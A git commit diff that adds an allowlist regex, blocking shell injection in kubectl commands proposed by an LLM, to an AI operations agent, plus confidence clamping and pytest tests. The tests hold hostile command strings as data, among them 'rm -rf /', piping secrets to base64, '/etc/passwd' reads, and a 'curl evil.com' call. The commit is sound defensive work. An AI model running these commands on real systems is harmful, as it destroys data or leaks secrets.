fix(solver): 補 import re(solver_agent 已有 re.compile 但漏 import)
Some checks are pending
CD Pipeline / build-and-deploy (push) Has started running

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
This commit is contained in:
Your Name
2026-04-25 02:42:25 +08:00
parent a49554c5a0
commit 39f45dd305
2 changed files with 291 additions and 16 deletions

View File

@@ -21,6 +21,7 @@ from __future__ import annotations
import asyncio
import hashlib
import re
import time
from typing import Any
@@ -41,6 +42,32 @@ logger = structlog.get_logger(__name__)
# Phase 2 單步 LLM timeout保留 Critic/Coordinator 的全局預算)
PHASE2_STEP_TIMEOUT_SEC = 20.0
# 2026-04-24 ogt + Claude Sonnet 4.6: kubectl 白名單正則Major #1 改版)
# 根因:黑名單枚舉不完整(如 $VAR、%0a、反引號 unicode 等繞過向量)
# 修復:改為白名單正則,只允許 kubectl 合法字元集
# 合法字符:英數、空白、- = . / : _ , @ (足以覆蓋完整 kubectl 語法)
# 任何不在此集合的字符(; & | ` $ > < 換行等)直接拒絕
# 範圍Nemo 路徑 + 標準 candidates 路徑雙層防護
_KUBECTL_COMMAND_PATTERN = re.compile(r"^kubectl\s+[A-Za-z0-9\s\-=./:_,@]+$")
def _is_safe_kubectl_command(cmd: str) -> bool:
"""kubectl 命令白名單驗證。
只允許 kubectl 開頭 + 合法字符集(英數、空白、- = . / : _ , @)。
任何 shell 元字符(; & | ` $ > < 換行等)皆返回 False。
Args:
cmd: 待驗證的命令字串
Returns:
True — 通過白名單False — 含非法字符或非 kubectl 開頭
"""
cmd = str(cmd).strip()
if not cmd.startswith("kubectl"):
return False
return _KUBECTL_COMMAND_PATTERN.fullmatch(cmd) is not None
class SolverAgent(BaseAgent):
"""
@@ -312,7 +339,19 @@ def _extract_candidates(parsed: dict[str, Any]) -> list[CandidateAction]:
# 新:先嘗試語意合成 kubectl 指令;真的無從映射才 return []
if "action_title" in parsed and "candidates" not in parsed:
action_title = str(parsed.get("action_title", ""))
confidence = float(parsed.get("confidence", 0.5))
# 2026-04-24 ogt + Claude Sonnet 4.6: confidence try/except + clampMajor #3/#4
# 根因LLM 可能回傳非數字字串(如 "high")或超界值(如 1.5 / -0.1
# float() 直接呼叫會 ValueError超界值會破壞 auto_approve 門檻判斷
# 修復try/except 捕捉型別錯誤 → 預設 0.5;再 clamp 到 [0.0, 1.0]
try:
confidence = float(parsed.get("confidence", 0.5))
except (TypeError, ValueError):
logger.warning(
"solver_nemo_confidence_type_error",
raw_confidence=parsed.get("confidence"),
)
confidence = 0.5
confidence = max(0.0, min(1.0, confidence))
risk_level = str(parsed.get("risk_level", "medium"))
risk_to_blast = {"critical": 60, "high": 40, "medium": 25, "low": 10}
blast = risk_to_blast.get(risk_level.lower(), 30)
@@ -323,19 +362,30 @@ def _extract_candidates(parsed: dict[str, Any]) -> list[CandidateAction]:
# 修法 A優先採用 kubectl_command 欄位,保留原始 confidence如 0.9
kubectl_cmd = str(parsed.get("kubectl_command", "")).strip()
if kubectl_cmd and kubectl_cmd.startswith("kubectl"):
logger.debug(
"solver_nemo_kubectl_command_used",
action_title=action_title[:80],
kubectl_command=kubectl_cmd[:80],
confidence=confidence,
)
return [CandidateAction(
action=kubectl_cmd[:200],
blast_radius=blast,
rollback_cost=20,
confidence=confidence,
rationale=f"OpenClaw Nemo: {action_title[:80]}",
)]
# 2026-04-24 ogt + Claude Sonnet 4.6: 白名單正則防注入Major #1 改版)
# 根因黑名單枚舉不完整改用白名單正則_is_safe_kubectl_command
# 修復:不通過白名單 → log warning → fall-through 到 action_title 路徑(不 return
if not _is_safe_kubectl_command(kubectl_cmd):
logger.warning(
"solver_kubectl_invalid_syntax",
cmd=kubectl_cmd[:80],
reason="未通過白名單正則檢驗",
)
# fall-through不採用此 kubectl_command繼續往下走 action_title 路徑
else:
logger.debug(
"solver_nemo_kubectl_command_used",
action_title=action_title[:80],
kubectl_command=kubectl_cmd[:80],
confidence=confidence,
)
return [CandidateAction(
action=kubectl_cmd[:200],
blast_radius=blast,
rollback_cost=20,
confidence=confidence,
rationale=f"OpenClaw Nemo: {action_title[:80]}",
)]
if "kubectl" in action_title.lower():
if action_title and confidence > 0:
@@ -389,8 +439,19 @@ def _extract_candidates(parsed: dict[str, Any]) -> list[CandidateAction]:
for item in raw:
if not isinstance(item, dict):
continue
# 2026-04-24 ogt + Claude Sonnet 4.6: 標準 candidates 路徑白名單防護Major #2
# 根因:標準路徑未驗證 action 欄位LLM 可注入含 shell 元字符的惡意命令
# 修復:每個 action 通過 _is_safe_kubectl_command 白名單檢驗,失敗則跳過
action = str(item.get("action", ""))[:200]
if not _is_safe_kubectl_command(action):
logger.warning(
"solver_standard_action_unsafe",
action=action[:80],
reason="未通過白名單檢驗",
)
continue
c = CandidateAction(
action=str(item.get("action", ""))[:200],
action=action,
blast_radius=max(0, min(100, int(item.get("blast_radius", 50)))),
rollback_cost=max(0, min(100, int(item.get("rollback_cost", 50)))),
confidence=float(item.get("confidence", 0.0)),

View File

@@ -14,7 +14,7 @@ sys.path.insert(0, os.path.join(os.path.dirname(__file__), "../../"))
import pytest
from src.agents.solver_agent import _extract_candidates
from src.agents.solver_agent import _extract_candidates, _is_safe_kubectl_command
class TestExtractCandidatesNemoFormat:
@@ -157,3 +157,217 @@ class TestExtractCandidatesNemoFormat:
assert result[0].blast_radius == expected_blast, (
f"risk_level={risk_level} → 期望 blast={expected_blast},實際 {result[0].blast_radius}"
)
class TestShellMetacharacterBlocking:
"""2026-04-24 Major #1 改版:白名單正則測試(取代原黑名單枚舉)"""
@pytest.mark.parametrize("malicious_cmd,desc", [
(
"kubectl rollout restart deployment/api -n awoooi-prod; rm -rf /",
"分號注入",
),
(
"kubectl get secret -n awoooi-prod | base64 -d",
"pipe 注入",
),
(
"kubectl get pods -n awoooi-prod `id`",
"反引號注入",
),
(
"kubectl exec deployment/api -- sh -c $EVIL_CMD",
"$ 變數展開",
),
(
"kubectl get pods -n awoooi-prod > /tmp/out",
"> 重定向",
),
(
"kubectl get pods -n awoooi-prod < /etc/passwd",
"< 重定向",
),
])
def test_nemo_kubectl_command_invalid_regex_blocked(self, malicious_cmd, desc):
"""Nemo 路徑:各類惡意 kubectl_command 均被白名單正則攔截"""
parsed = {
"action_title": "重啟服務",
"kubectl_command": malicious_cmd,
"confidence": 0.9,
"risk_level": "medium",
}
result = _extract_candidates(parsed)
# 惡意命令被阻擋 → fall-through → 語意合成 "重啟" → confidence 被壓到 0.5
assert len(result) == 1, f"{desc}: 期望 1 個結果(語意合成兜底)"
# 確認惡意片段未出現在最終 action 中
assert "rm -rf" not in result[0].action, f"{desc}: rm -rf 不應出現"
assert "base64" not in result[0].action, f"{desc}: base64 不應出現"
assert result[0].confidence == 0.5, f"{desc}: 語意合成路徑 confidence 必須被壓到 0.5"
def test_is_safe_kubectl_command_accepts_valid_commands(self):
"""白名單 helper合法 kubectl 命令應通過驗證"""
valid_cmds = [
"kubectl rollout restart deployment/awoooi-api -n awoooi-prod",
"kubectl scale deployment/awoooi-api --replicas=3 -n awoooi-prod",
"kubectl rollout undo deployment/awoooi-api -n awoooi-prod",
"kubectl get pods -n awoooi-prod -o wide",
"kubectl top pods -n awoooi-prod --sort-by=cpu",
"kubectl logs -n awoooi-prod --tail=100 --selector=app=awoooi-api",
]
for cmd in valid_cmds:
assert _is_safe_kubectl_command(cmd), f"合法命令被誤拒:{cmd}"
def test_is_safe_kubectl_command_rejects_non_kubectl(self):
"""白名單 helper非 kubectl 開頭的命令拒絕"""
assert not _is_safe_kubectl_command("helm rollback awoooi-api")
assert not _is_safe_kubectl_command("rm -rf /")
assert not _is_safe_kubectl_command("")
class TestConfidenceClampAndTypeError:
"""2026-04-24 Major #3/#4confidence clamp + type error 防禦測試"""
def test_confidence_clamp_above_1_0(self):
"""confidence > 1.0 被 clamp 到 1.0,防 auto_approve 門檻被破壞"""
parsed = {
"action_title": "重啟服務",
"kubectl_command": "kubectl rollout restart deployment/api -n awoooi-prod",
"confidence": 1.5,
"risk_level": "medium",
}
result = _extract_candidates(parsed)
assert len(result) == 1
assert result[0].confidence == 1.0, f"期望 1.0clamp實際 {result[0].confidence}"
def test_confidence_clamp_below_0_0(self):
"""confidence < 0.0 被 clamp 到 0.0"""
parsed = {
"action_title": "重啟服務",
"kubectl_command": "kubectl rollout restart deployment/api -n awoooi-prod",
"confidence": -0.3,
"risk_level": "medium",
}
result = _extract_candidates(parsed)
assert len(result) == 1
assert result[0].confidence == 0.0, f"期望 0.0clamp實際 {result[0].confidence}"
def test_confidence_non_numeric_string_fallback(self):
"""confidence 為非數字字串(如 "high")→ 預設 0.5"""
parsed = {
"action_title": "重啟服務",
"kubectl_command": "kubectl rollout restart deployment/api -n awoooi-prod",
"confidence": "high",
"risk_level": "medium",
}
result = _extract_candidates(parsed)
assert len(result) == 1
assert result[0].confidence == 0.5, f"期望 0.5fallback實際 {result[0].confidence}"
def test_confidence_none_type_fallback(self):
"""confidence 為 None → 預設 0.5"""
parsed = {
"action_title": "重啟服務",
"kubectl_command": "kubectl rollout restart deployment/api -n awoooi-prod",
"confidence": None,
"risk_level": "medium",
}
result = _extract_candidates(parsed)
assert len(result) == 1
assert result[0].confidence == 0.5, f"期望 0.5fallback實際 {result[0].confidence}"
class TestStandardCandidatesPathSafety:
"""2026-04-24 Major #2標準 candidates 路徑白名單防護測試"""
def test_standard_path_action_unsafe_blocked(self):
"""標準路徑:含 shell 元字符的 action 被跳過,不加入 candidates"""
parsed = {
"candidates": [
{
"action": "kubectl rollout restart deployment/api -n awoooi-prod; curl evil.com",
"blast_radius": 10,
"rollback_cost": 5,
"confidence": 0.85,
"rationale": "惡意注入",
}
]
}
result = _extract_candidates(parsed)
assert len(result) == 0, "含 shell 元字符的 action 不應加入 candidates"
def test_standard_path_safe_action_passes(self):
"""標準路徑:合法 kubectl action 正常通過白名單"""
parsed = {
"candidates": [
{
"action": "kubectl rollout restart deployment/awoooi-api -n awoooi-prod",
"blast_radius": 10,
"rollback_cost": 5,
"confidence": 0.85,
"rationale": "重啟修復 OOM",
}
]
}
result = _extract_candidates(parsed)
assert len(result) == 1
assert result[0].confidence == 0.85
assert result[0].blast_radius == 10
def test_standard_path_mixed_safe_unsafe_candidates(self):
"""標準路徑混合場景5 個 candidates2 個安全 3 個不安全,只回傳 2 個"""
parsed = {
"candidates": [
{
"action": "kubectl rollout restart deployment/awoooi-api -n awoooi-prod",
"blast_radius": 10,
"rollback_cost": 5,
"confidence": 0.9,
"rationale": "安全 1",
},
{
"action": "kubectl get pods -n awoooi-prod; rm -rf /",
"blast_radius": 10,
"rollback_cost": 5,
"confidence": 0.8,
"rationale": "不安全 1分號注入",
},
{
"action": "kubectl scale deployment/awoooi-api --replicas=2 -n awoooi-prod",
"blast_radius": 15,
"rollback_cost": 10,
"confidence": 0.75,
"rationale": "安全 2",
},
{
"action": "kubectl exec deployment/api -- sh -c $EVIL",
"blast_radius": 50,
"rollback_cost": 30,
"confidence": 0.7,
"rationale": "不安全 2$ 展開",
},
{
"action": "kubectl get secrets -n awoooi-prod | base64 -d",
"blast_radius": 5,
"rollback_cost": 1,
"confidence": 0.6,
"rationale": "不安全 3pipe",
},
]
}
result = _extract_candidates(parsed)
assert len(result) == 2, f"期望 2 個安全 candidates實際 {len(result)}"
# 結果按 confidence 降序排列
assert result[0].confidence == 0.9
assert result[1].confidence == 0.75
# 確認安全 candidates 的 action 內容正確
actions = [r.action for r in result]
assert "kubectl rollout restart deployment/awoooi-api -n awoooi-prod" in actions
assert "kubectl scale deployment/awoooi-api --replicas=2 -n awoooi-prod" in actions